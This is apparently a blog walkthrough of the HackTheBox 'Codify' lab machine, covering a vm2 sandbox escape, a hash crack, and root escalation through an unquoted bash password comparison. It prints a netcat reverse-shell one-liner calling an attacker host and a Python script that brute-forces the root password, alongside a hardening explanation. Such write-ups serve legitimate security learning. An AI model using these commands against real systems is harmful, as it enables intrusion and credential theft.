HackTheBox | Codify Walkthrough

Abdulrhman
4 min read · Apr 7, 2024


Hi Folks!

Hope you are doing well.

Let’s get started with enumeration.

Enumeration

Nmap Scan

nmap -T4 -v -p- -sCV <target_ip>
nmap scan

We got two open ports: port 22 running SSH and port 80 running HTTP.

The nmap output discloses a domain name, so let’s add it to the hosts file.

echo "<target_ip>  codify.htb" >> /etc/hosts

Web Enumeration

web interface

Doing manual enumeration, we found the /editor page, where we can run Node.js code in a sandbox environment.

/editor page

After trying to bypass the sandbox to get RCE or to read system files, I found that it has some limitations, listed on the /limitations page.

/limitations page

Here, I couldn’t bypass the sandbox environment, so I went back to navigating through the pages.

I got an interesting finding on /about page.

/about page

It says the site uses the vm2 library to run JavaScript code in a sandbox environment.

Here, I googled it and found an exploit that bypasses the sandbox and gets RCE on the system.

Sandbox bypass CVE-2023-30547, which allows an attacker to bypass sandbox limitations and execute arbitrary code in the host environment.

I modified the PoC to get the ID of the user in order to test it.

Testing the POC

Let’s modify the PoC to get a shell!

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <attacker_ip> <port> >/tmp/f
Shell on the system

Lateral Movement

Enumeration

After doing basic manual enumeration on the box, I found nothing.

I decided to check the web home directory /var/www and found a database file in the /var/www/contacts/ directory.

Joshua hash

We got a hash from the database file, let’s crack it.

cracking the hash

SSH Login

We got the password for Joshua, so let’s try to SSH in using these credentials.

ssh login

Privilege Escalation

By running sudo -l we see that we can execute the /opt/scripts/mysql-backup.sh script as root.

sudo -l

Let’s view the script.

sudo -l script

When the script runs, it asks for the root password before creating a backup of the database.

The comparison of the input with the root password is vulnerable: the unquoted input is matched as a shell pattern rather than compared literally, so if we enter * as the input it is accepted.

Because of this, we can write a script that brute forces the root password one character at a time until we have the whole password, trying a*, b*, etc.
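To make the weakness concrete, here is an added example (not the box's own /opt/scripts/mysql-backup.sh, whose exact contents the article only shows as a screenshot) that puts the unquoted comparison next to its quoted fix. The password value and the function names are constructed for the demonstration.

```bash
#!/usr/bin/env bash
# Added example (not the box's script): an unquoted [[ == ]] comparison
# next to the quoted form. The password below is constructed, not real.

# Vulnerable form: the right-hand side of == inside [[ ]] is unquoted, so
# bash treats the user input as a glob pattern. Input "*" matches any
# password, and "S*" matches any password starting with "S", which is
# exactly what makes character-by-character guessing possible.
weak_check() {
    local secret="$1" input="$2"
    if [[ $secret == $input ]]; then
        return 0   # the script would print "Password confirmed!"
    fi
    return 1
}

# Hardened form: quoting the right-hand side disables pattern matching,
# so the input has to equal the password byte for byte.
safe_check() {
    local secret="$1" input="$2"
    if [[ "$secret" == "$input" ]]; then
        return 0
    fi
    return 1
}

# Demo with a constructed password: shows which inputs each form accepts.
demo() {
    local secret="S3cretPassw0rd"   # constructed value for the demo
    local input
    for input in '*' 'S*' 'X*' 'S3cretPassw0rd'; do
        printf '%-16s weak=%s safe=%s\n' "$input" \
            "$(weak_check "$secret" "$input" && echo accepted || echo rejected)" \
            "$(safe_check "$secret" "$input" && echo accepted || echo rejected)"
    done
}

demo
```

Running it shows that the unquoted form accepts *, S* and the real password, while the quoted form accepts only the exact password. The POSIX test `[ "$a" = "$b" ]` never does pattern matching either, so it is a safe alternative when the script does not need bash-specific features; and a root-owned script that compares a user-typed secret is worth flagging in review regardless, since any such comparison is one missing quote away from this bug.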

Here is the Python script used to brute force the password.

import string
import subprocess

# Candidate characters: the root password is assumed to be alphanumeric.
charset = string.ascii_letters + string.digits
password = ""
found = False

while not found:
    for character in charset:
        # Feed the current guess plus "*" to the script; the unquoted
        # comparison accepts it whenever the real password starts with the guess.
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(
            command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
        ).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        # No further character was accepted, so the password is complete.
        found = True

After running the script, we got the root password.

root

Conclusion

This was great fun!

I hope you enjoyed the walkthrough. I’m waiting for your feedback.

Don’t forget to check other walkthroughs.
